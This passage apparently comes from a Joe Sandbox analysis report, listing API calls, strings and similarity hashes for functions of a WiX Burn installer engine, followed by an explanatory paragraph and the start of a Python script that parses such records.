                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                              • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                              • API String ID: 3686190907-1954264426
                                                                                                                                                              • Opcode ID: 6fc0f3be7ea1c6a470bac8d292ab6e3dc9198f82b70cfa36ffedab2871321e14
                                                                                                                                                              • Instruction ID: 6fb667c31042a994477891943e1c58bcbdd3f494868cb59200453c8437fc9fa2
                                                                                                                                                              • Opcode Fuzzy Hash: 6fc0f3be7ea1c6a470bac8d292ab6e3dc9198f82b70cfa36ffedab2871321e14
                                                                                                                                                              • Instruction Fuzzy Hash: 6A012673A81636A7C73257858C0AADF7AA9FF04B71B02016ABE14FB380E7588D00C1E4
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D69BB
                                                                                                                                                              • GetLastError.KERNEL32(?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D69C5
                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000001,00000000,?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D6A04
                                                                                                                                                              • GetLastError.KERNEL32(?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D6A0E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                              • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                              • API String ID: 3686190907-2546940223
                                                                                                                                                              • Opcode ID: 6640e82fdfe1337833c7d19bce23c06ee72daf698495ab24f9f5036a4860ce50
                                                                                                                                                              • Instruction ID: cbd7c5bae121dd0e73ac3f38e7ca24cfcb658f9b5dbb46c03c6c0e8e883cc67f
                                                                                                                                                              • Opcode Fuzzy Hash: 6640e82fdfe1337833c7d19bce23c06ee72daf698495ab24f9f5036a4860ce50
                                                                                                                                                              • Instruction Fuzzy Hash: 8811A570740206FBDB109FA19D06B6E36BCFF00710F10816AB954E9390EB39DE409764
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(yT|,000000FF,00AAC56B,E90080BA,007C53BD,00000000,?,E90080BA,00000000), ref: 007DAC94
                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,yT|,000000FF,00AAC56B,E90080BA,007C53BD,00000000,?,E90080BA,00000000), ref: 007DACD8
                                                                                                                                                              Strings
                                                                                                                                                              • cache.cpp, xrefs: 007DAC6A, 007DACB8, 007DACFC
                                                                                                                                                              • Failed to get provider state from authenticode certificate., xrefs: 007DACC2
                                                                                                                                                              • Failed to verify expected payload against actual certificate chain., xrefs: 007DAD1E
                                                                                                                                                              • yT|, xrefs: 007DAC88
                                                                                                                                                              • Failed authenticode verification of payload: %ls, xrefs: 007DAC75
                                                                                                                                                              • Failed to get signer chain from authenticode certificate., xrefs: 007DAD06
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                              • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp$yT|
                                                                                                                                                              • API String ID: 1452528299-1607621356
                                                                                                                                                              • Opcode ID: 3d1e70471aede2138eb965441d540d2fad1e1db3976de5f97ab932ff359b8322
                                                                                                                                                              • Instruction ID: 28170f85aeeafe7cc8661ed8cba32a57733eef202e9d40b25e999a0cf9c62c57
                                                                                                                                                              • Opcode Fuzzy Hash: 3d1e70471aede2138eb965441d540d2fad1e1db3976de5f97ab932ff359b8322
                                                                                                                                                              • Instruction Fuzzy Hash: 66418772D01229BBDB119B94CC46BDEBBB8FF04720F11012AF914FB381E77959408AE1
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007DF7EE
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007DF8FB
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set source path for payload., xrefs: 007DF88A
                                                                                                                                                              • UX requested unknown container with id: %ls, xrefs: 007DF8BA
                                                                                                                                                              • Failed to set source path for container., xrefs: 007DF8E0
                                                                                                                                                              • UX denied while trying to set source on embedded payload: %ls, xrefs: 007DF870
                                                                                                                                                              • Engine is active, cannot change engine state., xrefs: 007DF808
                                                                                                                                                              • UX requested unknown payload with id: %ls, xrefs: 007DF85A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                              • API String ID: 3168844106-4121889706
                                                                                                                                                              • Opcode ID: bf60864f7827ea478d0d13e6146d173753d1178f51c7af8d3905ad25675fc9c9
                                                                                                                                                              • Instruction ID: 7dc4b6c8bf05426c7da31362dc8ee40b584824894a96c069a84f674ee4c9a12f
                                                                                                                                                              • Opcode Fuzzy Hash: bf60864f7827ea478d0d13e6146d173753d1178f51c7af8d3905ad25675fc9c9
                                                                                                                                                              • Instruction Fuzzy Hash: DD310432A00655ABCB219B58CC4AE9A77BCFF14720B15402BF806EB341DB7DED40A792
APIs
• lstrlenW.KERNEL32(00000000), ref: 007C7210
Strings
• Failed to format escape sequence., xrefs: 007C72AA
• Failed to append escape sequence., xrefs: 007C72A3
• Failed to copy string., xrefs: 007C72C4
• Failed to append characters., xrefs: 007C729C
• [\%c], xrefs: 007C726F
• Failed to allocate buffer for escaped string., xrefs: 007C7227
• []{}, xrefs: 007C723A
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: lstrlen
• String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
• API String ID: 1659193697-3250950999
• Opcode ID: c6498e17625aa4f2d22c1360696a828684f9e4849b4a866a6d56ee79080f3b92
• Instruction ID: 5fc2cff65f44c6ff6801ed4f94983fd6a0f02271a00598f86ae999d904ae50b6
• Opcode Fuzzy Hash: c6498e17625aa4f2d22c1360696a828684f9e4849b4a866a6d56ee79080f3b92
• Instruction Fuzzy Hash: 4F21B432909619B6DB255A948C46FAE7BB9FF10731F20011DB901F6181DEBD5E00DA91
APIs
• CompareStringW.KERNEL32(00000000,00000000,0080B500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,007E67DE,?,00000001,?,0080B4A0), ref: 007E5C45
Strings
• Failed to insert execute action., xrefs: 007E5C9A
• Failed grow array of ordered patches., xrefs: 007E5CDE
• feclient.dll, xrefs: 007E5C3B, 007E5D65
• Failed to plan action for target product., xrefs: 007E5CF0
• Failed to copy target product code., xrefs: 007E5D78
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CompareString
• String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
• API String ID: 1825529933-3477540455
• Opcode ID: 1026f39155cadbcc0ffddbd6788be764b539542e130a5374cb885b83918f5d9e
• Instruction ID: 80ad8ef06b2ebe01f0c1ba3ebe97da2fd14e4ac333515a31f18f358ede7371d5
• Opcode Fuzzy Hash: 1026f39155cadbcc0ffddbd6788be764b539542e130a5374cb885b83918f5d9e
• Instruction Fuzzy Hash: 818127B560178ADFCB14CF59C890AAA77A5FF08328F218569EC158B362D734EC51CFA0
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007FD262,00000000,00000000,00000000,00000000,00000000,007F2F1D), ref: 007FCB2F
• __fassign.LIBCMT ref: 007FCBAA
• __fassign.LIBCMT ref: 007FCBC5
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 007FCBEB
• WriteFile.KERNEL32(?,00000000,00000000,007FD262,00000000,?,?,?,?,?,?,?,?,?,007FD262,00000000), ref: 007FCC0A
• WriteFile.KERNEL32(?,00000000,00000001,007FD262,00000000,?,?,?,?,?,?,?,?,?,007FD262,00000000), ref: 007FCC43
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 009352effc442a397bba2e0a3bbb973f6ded9eb283e3732207532b7364599c08
• Instruction ID: e98160b6568b1166a46c08bc03db14df08f3a422497ac6aec7cd9372bcdf1a5d
• Opcode Fuzzy Hash: 009352effc442a397bba2e0a3bbb973f6ded9eb283e3732207532b7364599c08
• Instruction Fuzzy Hash: 8B5191B1A0024D9FDB15CFA8DA85AEEBBF4FF09310F14411AE655E7391E7349941CBA0
APIs
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,007D7113,000000B8,0000001C,00000100), ref: 007E92A4
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0080B4B8,000000FF,?,?,?,007D7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 007E932E
Strings
• detect.cpp, xrefs: 007E938E
• comres.dll, xrefs: 007E93B0
• Failed to initialize update bundle., xrefs: 007E93D1
• BA aborted detect forward compatible bundle., xrefs: 007E9398
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CompareString
• String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
• API String ID: 1825529933-439563586
• Opcode ID: f05e82fc4de15fb835519af0d783e2d4ba7f19cb062e80bc954b08047e3d6629
• Instruction ID: f08999fa824631815102019f5a41dc8db3b9f4e603df5505fffd2514563c1ef8
• Opcode Fuzzy Hash: f05e82fc4de15fb835519af0d783e2d4ba7f19cb062e80bc954b08047e3d6629
• Instruction Fuzzy Hash: 3351C272601241FFDF159F66CC85EAAB76AFF09310F104269FA249A2A1C775EC60DB90
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0080033C
• GetComputerNameW.KERNEL32(?,?), ref: 00800394
Strings
• --- logging level: %hs ---, xrefs: 00800454
• === Logging started: %ls ===, xrefs: 008003BF
• Computer : %ls, xrefs: 00800402
• Executable: %ls v%d.%d.%d.%d, xrefs: 008003F0
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Name$ComputerFileModule
• String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
• API String ID: 2577110986-3153207428
• Opcode ID: 7dba6d4164692d4e45d7ba60197779fad4a72acc7ae2d24ea7b2c03c134b68c9
• Instruction ID: 49675228910a57bd4f9d625fde1d95797e53b9befc5c6e4db09800a62f7f9c8e
• Opcode Fuzzy Hash: 7dba6d4164692d4e45d7ba60197779fad4a72acc7ae2d24ea7b2c03c134b68c9
• Instruction Fuzzy Hash: BF4163B2900118AFCB619F64ED45BAA77BCFB44304F4081A6F649E3182D6359E858FA9
APIs
• CloseHandle.KERNEL32(00000000,?,?,00000001,0080B500,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,007D74E6), ref: 007DD560
Strings
• elevation.cpp, xrefs: 007DD46B
• Failed to elevate., xrefs: 007DD542
• Failed to create pipe and cache pipe., xrefs: 007DD4BD
• UX aborted elevation requirement., xrefs: 007DD475
• Failed to create pipe name and client token., xrefs: 007DD4A1
• Failed to connect to elevated child process., xrefs: 007DD549
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                              • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                              • API String ID: 2962429428-3003415917
                                                                                                                                                              • Opcode ID: 75aef909a8f37ef2509bf06d5ec31693eefea8a08638f01ac578361452f7adfa
                                                                                                                                                              • Instruction ID: 10b51e3a34d60e03a57d9c1373ed5c9ee852d8c9a886606af93bab7c552ad4d3
                                                                                                                                                              • Opcode Fuzzy Hash: 75aef909a8f37ef2509bf06d5ec31693eefea8a08638f01ac578361452f7adfa
                                                                                                                                                              • Instruction Fuzzy Hash: A7315B72644621BBE73196A4DC4BFBAB37CEF00734F20420BF905E6381DB69AD5082D5

APIs
• lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 008015DA
• lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0080163C
• lstrlenW.KERNEL32(?), ref: 00801648
• RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0080168B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: lstrlen$Value
• String ID: BundleUpgradeCode$regutil.cpp
• API String ID: 198323757-1648651458
• Opcode ID: 6e7b99ce60fe40923ed9206ee330ebf5d8eae10ac5971c15bd68f7b02cc1b737
• Instruction ID: 3d297e31530d0ed510589667a87fc562cbe769a4d582d0c8b74ccc468f6c01a5
• Opcode Fuzzy Hash: 6e7b99ce60fe40923ed9206ee330ebf5d8eae10ac5971c15bd68f7b02cc1b737
• Instruction Fuzzy Hash: 0E41737290022AAFCF219F988C89EAEB7B8FF54760F050169FD11EB250D771DD118BA0

APIs
• EnterCriticalSection.KERNEL32(0082B5FC,00000000,?,?,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 00800533
• CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0082B5F4,?,007D4207,00000000,Setup), ref: 008005D7
• GetLastError.KERNEL32(?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?,?,?), ref: 008005E7
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 00800621
  • Part of subcall function 007C2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 007C2F09
• LeaveCriticalSection.KERNEL32(0082B5FC,?,?,0082B5F4,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 0080067A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
• String ID: logutil.cpp
• API String ID: 4111229724-3545173039
• Opcode ID: 1f7f7bcdb08b7cf4364a3b8173a023c62f3439ff5825b8b6fd2ba1a27ec361f7
• Instruction ID: 3baac1dc8a006a65edb02ea44ece75c048277a3184315b69ca67f0671615d0b2
• Opcode Fuzzy Hash: 1f7f7bcdb08b7cf4364a3b8173a023c62f3439ff5825b8b6fd2ba1a27ec361f7
• Instruction Fuzzy Hash: 9731E371A0172AFFCB615F609D45F6A7769FB10750F044228B921EA2E1D736CD609FA0

APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007E39F4
Strings
• Failed to format property value., xrefs: 007E3A7D
• Failed to escape string., xrefs: 007E3A76
• Failed to append property string part., xrefs: 007E3A68
• %s%="%s", xrefs: 007E3A27
• Failed to format property string part., xrefs: 007E3A6F
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Open@16
• String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
• API String ID: 3613110473-515423128
• Opcode ID: 93cffb428365adb7ed1fd149ba3a340cff9b072705d97701429e9afdfe8fa35b
• Instruction ID: add4680b4afc813a07d50f8b9bd8b72365c4efcddd95f40f4924087bbfea68c2
• Opcode Fuzzy Hash: 93cffb428365adb7ed1fd149ba3a340cff9b072705d97701429e9afdfe8fa35b
• Instruction Fuzzy Hash: 1D310532806169EFCB159E99CC4AEAEB778EF04714F00826EF811A7241D778AF50DB90

APIs
• MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001), ref: 00804203
• GetLastError.KERNEL32(00000002,?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001,000007D0,00000001,00000001,00000003), ref: 00804212
• MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001), ref: 008042A6
• GetLastError.KERNEL32(?,0080432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,007DA063,00000001,000007D0,00000001), ref: 008042B0
  • Part of subcall function 00804440: FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
  • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: File$ErrorFindLastMove$CloseFirst
• String ID: \$fileutil.cpp
• API String ID: 3479031965-1689471480
• Opcode ID: 4bff8bf332daa2c5ccc788bada644bd08583a012c6e9495af8a9ee2641685c69
• Instruction ID: 499498539cb8282708bd375540835fa0c0020eba4c823c5e51e06779ccff2032
• Opcode Fuzzy Hash: 4bff8bf332daa2c5ccc788bada644bd08583a012c6e9495af8a9ee2641685c69
• Instruction Fuzzy Hash: F531E1B6B8123AEBDBB19E99CC00A6F7669FF91760B116039FE04DB294D3708C41C6D0

APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,007C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 007C733E
• LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,007C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 007C741D
Strings
• Failed to get variable: %ls, xrefs: 007C737F
• Failed to format value '%ls' of variable: %ls, xrefs: 007C73E7
• *****, xrefs: 007C73D9, 007C73E6
• Failed to get unformatted string., xrefs: 007C73AE
• Failed to get value as string for variable: %ls, xrefs: 007C740C
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
• API String ID: 3168844106-2873099529
• Opcode ID: cded41f07248007ff030385156b74667a387fe3d992dca818c613b7a9e706014
• Instruction ID: 8bedb05d8cfca474cb25ac28eadb2e916e4362fea939d4d6ca6c252b8faade9e
• Opcode Fuzzy Hash: cded41f07248007ff030385156b74667a387fe3d992dca818c613b7a9e706014
• Instruction Fuzzy Hash: 50318D3290459AFBCF265E50CC09F9E7B64FF14361F10426DF810A6290DB79AA90EFD4
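The function records in this part of the report are the raw per-function metadata produced by the Joe Sandbox IDA plugin: resolved API calls with the address of each call site, the log strings a function references with their xrefs, and the Similarity fingerprints (API ID, String ID, Opcode/Instruction fuzzy hashes). Read together, the source file names that leak through the strings (elevation.cpp, regutil.cpp, logutil.cpp, fileutil.cpp, cache.cpp) and strings such as BundleUpgradeCode and "Failed to connect to elevated child process." match the log strings of the WiX Burn bootstrapper engine, so these routines describe the installer shell; the report's behavioural signatures, not this engine code, are what distinguish a malicious bundle from a benign installer. The Python below is an added example for working with records in this layout; it is not part of the Joe Sandbox report or toolchain. The regular expressions and the embedded SAMPLE text are constructed for the example from the record layout shown above (the field labels are the report's own, the values in SAMPLE are illustrative), and the helper names are the example's, not any Joe Sandbox API.

```python
"""Parse Joe Sandbox per-function records (the APIs / Strings / Memory Dump
Source / Similarity blocks in this report) into structured data and
summarise what the recovered functions touch."""
import re
from dataclasses import dataclass, field

# Constructed sample input: two records in the same layout as the report's
# function blocks. Values are illustrative, not copied from the report.
SAMPLE = """\
APIs
• CloseHandle.KERNEL32(00000000,?,00000001), ref: 007DD560
Strings
• elevation.cpp, xrefs: 007DD46B
• Failed to elevate., xrefs: 007DD542
Memory Dump Source
• Source File: 00000000.00000002.sdmp, Offset: 007C0000, based on PE: true
Similarity
• API ID: CloseHandle
• String ID: Failed to elevate.$elevation.cpp
• API String ID: 2962429428-3003415917
APIs
• lstrlenW.KERNEL32(?,BundleUpgradeCode), ref: 008015DA
• RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?), ref: 0080168B
  • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
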